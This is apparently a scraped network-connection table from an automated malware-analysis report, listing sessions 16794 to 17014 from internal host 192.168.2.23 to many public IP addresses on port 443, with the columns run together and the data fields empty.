                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16794192.168.2.235326086.139.126.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16795192.168.2.235760612.43.3.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16796192.168.2.2339902223.177.96.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16797192.168.2.2355746154.234.158.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16798192.168.2.2341820143.105.125.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16799192.168.2.2347668151.50.187.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16800192.168.2.2353004222.40.216.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16801192.168.2.234928059.225.37.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16802192.168.2.2351598109.172.107.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16803192.168.2.234649264.180.128.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16804192.168.2.234040461.139.120.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16805192.168.2.2350850142.70.96.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16806192.168.2.2345626140.240.244.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16807192.168.2.2341678201.238.73.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16808192.168.2.234655244.121.105.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16809192.168.2.2333048191.46.112.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16810192.168.2.233362676.76.54.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16811192.168.2.2344500100.216.156.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16812192.168.2.236017472.121.79.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16813192.168.2.233525461.75.110.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16814192.168.2.234333684.62.137.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16815192.168.2.2352212219.80.115.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16816192.168.2.2358570152.62.93.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16817192.168.2.2334532117.181.116.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16818192.168.2.2349010171.4.121.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16819192.168.2.233552244.107.36.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16820192.168.2.2356372213.235.204.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16821192.168.2.2334166171.132.129.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16822192.168.2.2341802119.72.163.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16823192.168.2.2348160149.102.35.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16824192.168.2.2334408141.229.241.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16825192.168.2.2345590152.207.203.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16826192.168.2.2341168172.15.121.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16827192.168.2.235579851.156.80.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16828192.168.2.234459412.185.219.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16829192.168.2.2355274166.161.50.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16830192.168.2.2343792190.161.19.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16831192.168.2.2352092192.77.137.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16832192.168.2.2348644175.71.37.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16833192.168.2.2344256165.33.226.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16834192.168.2.234500699.225.161.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16835192.168.2.2340060109.118.147.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16836192.168.2.235695035.44.132.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16837192.168.2.233622236.59.61.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16838192.168.2.235321054.100.22.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16839192.168.2.234416817.99.110.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16840192.168.2.234160053.79.16.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16841192.168.2.2341628201.69.31.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16842192.168.2.2338258108.86.218.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16843192.168.2.235549091.169.187.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16844192.168.2.2335552123.134.178.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16845192.168.2.2356642205.64.28.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16846192.168.2.233909035.243.53.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16847192.168.2.234081691.94.229.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16848192.168.2.2334808117.64.34.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16849192.168.2.233670487.193.212.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16850192.168.2.2339100125.240.171.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16851192.168.2.233306095.101.19.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16852192.168.2.2351576207.45.39.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16853192.168.2.2339544111.60.73.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16854192.168.2.2357348199.105.224.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16855192.168.2.2360866218.188.54.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16856192.168.2.2342502139.25.168.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16857192.168.2.2347398133.168.67.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16858192.168.2.235190693.231.127.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16859192.168.2.2342840121.201.107.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16860192.168.2.235576049.79.41.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16861192.168.2.2355662162.220.235.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16862192.168.2.233979647.97.148.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16863192.168.2.2358170209.126.49.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16864192.168.2.234388035.0.56.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16865192.168.2.2338300118.243.147.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16866192.168.2.2338116173.181.0.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16867192.168.2.233733439.241.235.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16868192.168.2.2339292210.100.83.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16869192.168.2.2339324201.212.170.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16870192.168.2.2334870212.172.43.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16871192.168.2.2355514219.94.112.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16872192.168.2.2335696218.221.161.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16873192.168.2.2349800142.105.76.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16874192.168.2.233870063.186.140.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16875192.168.2.233977843.4.101.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16876192.168.2.235672671.56.68.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16877192.168.2.2359970176.112.86.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16878192.168.2.2334428199.213.69.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16879192.168.2.235859253.161.155.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16880192.168.2.235135679.248.3.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16881192.168.2.235299470.43.18.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16882192.168.2.2339482154.131.164.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16883192.168.2.2338018125.13.114.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16884192.168.2.2360714196.129.61.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16885192.168.2.2348124221.150.79.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16886192.168.2.234540471.152.208.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16887192.168.2.234909090.247.89.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16888192.168.2.235324886.73.217.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16889192.168.2.2341926163.127.211.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16890192.168.2.23332968.178.146.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16891192.168.2.233879085.85.56.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16892192.168.2.2341496130.158.172.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16893192.168.2.2359278221.53.23.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16894192.168.2.2355958123.181.166.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16895192.168.2.235663080.28.80.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16896192.168.2.235555463.47.253.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16897192.168.2.233553665.98.213.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16898192.168.2.234560467.55.158.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16899192.168.2.2348052151.169.24.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16900192.168.2.2336444128.90.72.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16901192.168.2.2349602164.23.210.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16902192.168.2.2358414140.11.120.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16903192.168.2.2350638130.251.105.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16904192.168.2.234862267.147.45.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16905192.168.2.2360060156.15.124.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16906192.168.2.2350614212.51.177.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16907192.168.2.234692263.123.234.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16908192.168.2.235890089.162.31.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16909192.168.2.235376292.230.230.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16910192.168.2.2339398208.179.103.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16911192.168.2.2353712139.106.49.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16912192.168.2.2351464102.141.129.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16913192.168.2.2351246207.81.27.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16914192.168.2.234571046.218.254.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16915192.168.2.2360316137.208.190.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16916192.168.2.2353932102.183.130.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16917192.168.2.2352972110.52.214.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16918192.168.2.235265451.30.255.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16919192.168.2.233311632.231.178.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16920192.168.2.2347216139.47.131.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16921192.168.2.23341825.60.221.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16922192.168.2.2334972147.147.180.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16923192.168.2.234603467.178.227.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16924192.168.2.233797883.240.182.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16925192.168.2.2342626122.252.8.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16926192.168.2.233619295.85.198.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16927192.168.2.233331259.216.179.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16928192.168.2.2347348177.73.245.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16929192.168.2.2340674203.94.73.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16930192.168.2.234392677.23.199.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16931192.168.2.2352238136.164.110.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16932192.168.2.2360468183.128.103.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16933192.168.2.2356594185.159.29.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16934192.168.2.2351790192.140.214.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16935192.168.2.2345122206.227.45.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16936192.168.2.2357086216.53.88.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16937192.168.2.2336082132.71.165.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16938192.168.2.234188027.120.229.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16939192.168.2.235008894.76.127.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16940192.168.2.2354978113.224.222.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16941192.168.2.2349818160.6.10.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16942192.168.2.2345642106.251.61.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16943192.168.2.2343674217.111.2.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16944192.168.2.23544682.34.215.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16945192.168.2.235468248.141.194.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16946192.168.2.2342970148.75.193.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16947192.168.2.2346864199.249.77.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16948192.168.2.233931878.236.61.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16949192.168.2.2344020200.130.158.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16950192.168.2.23437825.160.41.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16951192.168.2.2352996222.35.119.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16952192.168.2.2334100146.42.205.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16953192.168.2.234858046.70.118.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16954192.168.2.23355048.213.22.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16955192.168.2.2347602136.166.208.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16956192.168.2.2335026195.60.95.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16957192.168.2.2357672191.227.133.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16958192.168.2.2345450119.2.151.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16959192.168.2.2343218211.51.133.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16960192.168.2.2341838147.0.1.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16961192.168.2.2344728209.182.124.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16962192.168.2.2338166193.6.151.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16963192.168.2.2342972212.93.169.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16964192.168.2.234153899.73.60.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16965192.168.2.233825635.199.160.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16966192.168.2.2359062197.237.15.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16967192.168.2.2349572208.112.175.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16968192.168.2.2336640143.93.41.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16969192.168.2.2356110182.169.21.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16970192.168.2.2353764131.3.197.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16971192.168.2.2347276141.152.146.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16972192.168.2.2333392183.254.227.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16973192.168.2.2359808209.225.243.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16974192.168.2.2344424170.155.246.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16975192.168.2.2332928176.7.173.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16976192.168.2.2343564152.128.73.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16977192.168.2.2350178123.26.91.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16978192.168.2.2343632211.132.240.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16979192.168.2.23510548.248.94.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16980192.168.2.2340924179.34.250.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16981192.168.2.2352524112.56.30.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16982192.168.2.2337064105.55.217.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16983192.168.2.23427549.69.220.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16984192.168.2.234579438.70.104.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16985192.168.2.2349100174.31.176.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16986192.168.2.2350914161.34.110.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16987192.168.2.2351756121.171.76.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16988192.168.2.234422860.140.162.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16989192.168.2.2349602157.37.26.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16990192.168.2.2354874177.74.105.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16991192.168.2.2349114180.171.52.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16992192.168.2.2348820162.10.111.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16993192.168.2.233356236.103.239.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16994192.168.2.235155284.124.79.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16995192.168.2.2342522115.139.47.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16996192.168.2.2347548192.171.147.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16997192.168.2.2350706117.215.92.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16998192.168.2.2341186105.14.219.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16999192.168.2.233491685.107.188.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17000192.168.2.2354976140.163.131.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17001192.168.2.236013627.20.51.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17002192.168.2.2349726140.114.47.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17003192.168.2.2345612120.205.9.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17004192.168.2.2357256198.221.215.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17005192.168.2.235270092.20.49.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17006192.168.2.233295490.118.19.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17007192.168.2.234747245.235.236.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17008192.168.2.234674625.128.250.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17009192.168.2.2354030151.158.167.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17010192.168.2.235580259.51.46.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17011192.168.2.2340274219.84.237.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17012192.168.2.2342948111.72.213.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17013192.168.2.2355798157.8.253.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17014192.168.2.2359076150.100.221.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
